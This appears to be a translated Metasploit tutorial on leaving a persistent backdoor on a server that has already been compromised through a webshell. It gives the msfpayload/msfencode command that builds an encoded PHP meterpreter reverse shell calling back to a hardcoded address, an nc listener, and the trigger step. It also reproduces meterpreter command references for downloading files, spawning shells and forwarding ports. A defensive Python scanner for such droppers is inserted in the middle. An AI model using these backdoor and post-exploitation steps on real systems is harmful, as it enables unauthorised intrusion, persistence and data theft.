1. Preparation
The scenario: we have already obtained a webshell and want to leave a backdoor of our own behind. At this point we can use msfpayload together with msfconsole.
Start the PostgreSQL service: service postgresql start
Start the Metasploit service: service metasploit start
Start msfconsole: msfconsole
Check the database connection status: db_status
Generate the backdoor file:
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.133.128 LPORT=5555 R | msfencode -e php/base64 -t raw -o /root/Desktop/exp.php
The raw output has no PHP tags, so exp.php needs <?php ?> added to it.
Start a listener on the attacking side
or
nc 192.168.133.128 -lvp 5555
Then browse to the backdoor file to trigger it.
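As an added defensive example (not part of this post), here is a small Python scanner that flags PHP files shaped like the backdoor generated above: an eval(base64_decode(...)) wrapper whose decoded body calls a socket function and hardcodes an LHOST/LPORT pair. The eval/base64_decode wrapper shape and the $ip/$port variable names are assumptions about how such a dropper looks; the sample files are constructed.

```python
import base64
import re

# Markers this scanner looks for. The eval(base64_decode(...)) wrapper is the shape the
# php/base64 encoder is assumed to produce on disk; the socket functions are what any PHP
# reverse shell or stager needs in order to dial back to LHOST:LPORT.
EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\)")
NET_FUNCS = ("fsockopen", "stream_socket_client", "socket_create", "socket_connect")
IP_ASSIGN = re.compile(r"\$ip\s*=\s*['\"]([\d.]+)['\"]")     # assumed variable name
PORT_ASSIGN = re.compile(r"\$port\s*=\s*['\"]?(\d+)")         # assumed variable name

def scan_php(name, source):
    """Return a finding dict for one PHP source, or None if nothing suspicious."""
    m = EVAL_B64.search(source)
    if not m:
        return None
    try:
        inner = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:
        inner = ""  # undecodable blob: still report the eval wrapper
    funcs = [f for f in NET_FUNCS if f in inner]
    ip = IP_ASSIGN.search(inner)
    port = PORT_ASSIGN.search(inner)
    return {
        "file": name,
        "net_funcs": funcs,
        "callback": f"{ip.group(1)}:{port.group(1)}" if ip and port else None,
    }

def scan_webroot(files):
    """files: {path: source}. Returns findings for every file that matches."""
    return [f for f in (scan_php(p, s) for p, s in files.items()) if f]

# Constructed samples (not real msfencode output): a mock dropper and a plain page.
MOCK_STAGER = "$ip = '192.168.133.128'; $port = 5555; $s = fsockopen($ip, $port); fwrite($s, 'hi');"
SAMPLE_FILES = {
    "/var/www/html/exp.php": "<?php eval(base64_decode('"
        + base64.b64encode(MOCK_STAGER.encode()).decode() + "')); ?>",
    "/var/www/html/index.php": "<?php echo 'hello'; ?>",
}

if __name__ == "__main__":
    for finding in scan_webroot(SAMPLE_FILES):
        print(finding)
```

Pair a finding's callback address with outbound connection logs from the web server host to confirm whether the backdoor was ever triggered.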
2. What if we want to save the sessions we obtain? First we must connect to the database.
exploit -h
  -e <opt>  The payload encoder to use. If none is specified, ENCODER is used.  (payload encoder; the default is used if none is given)
  -f        Force the exploit to run regardless of the value of MinimumRank.
  -h        Help banner.
  -j        Run in the context of a job.  (run in the background)
  -n <opt>  The NOP generator to use. If none is specified, NOP is used.
  -o <opt>  A comma separated list of options in VAR=VAL format.
  -p <opt>  The payload to use. If none is specified, PAYLOAD is used.
  -t <opt>  The target index to use. If none is specified, TARGET is used.
  -z        Do not interact with the session after successful exploitation  (create the session and send it to the background)

sessions -h
  -K        Terminate all sessions  (kill all sessions)
  -c <opt>  Run a command on the session given with -i, or all  (run a command)
  -d <opt>  Detach an interactive session
  -h        Help banner
  -i <opt>  Interact with the supplied session ID  (connect to a session)
  -k <opt>  Terminate sessions by session ID and/or range
  -l        List all active sessions
  -q        Quiet mode
  -r        Reset the ring buffer for the session given with -i, or all
  -s <opt>  Run a script on the session given with -i, or all
  -t <opt>  Set a response timeout (default: 15)
  -u <opt>  Upgrade a shell to a meterpreter session on many platforms
  -v        List verbose fields
3. Using meterpreter
Core Commands (core commands)
=============
    Command                   Description
    -------                   -----------
    ?                         Help menu  (show help)
    background                Backgrounds the current session  (send the session to the background)
    bgkill                    Kills a background meterpreter script  (kill a background meterpreter script)
    bglist                    Lists running background scripts  (list background meterpreter scripts)
    bgrun                     Executes a meterpreter script as a background thread  (run a script in a background thread)
    channel                   Displays information about active channels  (show active channels)
    close                     Closes a channel  (close a channel)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session  (exit)
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode  (open a Ruby shell)
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands (file commands)
============================
    Command                   Description
    -------                   -----------
    cat                       Read the contents of a file to the screen
    cd                        Change directory
    download                  Download a file or directory
    edit                      Edit a file
    getlwd                    Print local working directory
    getwd                     Print working directory
    lcd                       Change local working directory
    lpwd                      Print local working directory
    ls                        List files
    mkdir                     Make directory
    pwd                       Print working directory
    rm                        Delete the specified file
    rmdir                     Remove directory
    search                    Search for files
    upload                    Upload a file or directory

Stdapi: Networking Commands (network commands)
===========================
    Command                   Description
    -------                   -----------
    portfwd                   Forward a local port to a remote service  (port forwarding)

Example:
portfwd add -l 5555 -p 3389 -r 192.168.198.129
This forwards port 3389 on 192.168.198.129 to local port 5555.

Stdapi: System Commands
=======================
    Command                   Description
    -------                   -----------
    execute                   Execute a command  (run a command)
    getenv                    Get one or more environment variable values
    getpid                    Get the current process identifier
    getuid                    Get the user that the server is running as
    kill                      Terminate a process
    ps                        List running processes
    shell                     Drop into a system command shell  (spawn a shell)
    sysinfo                   Gets information about the remote system, such as OS  (show system information)
See also: A first look at meterpreter
msfpayload reverse shell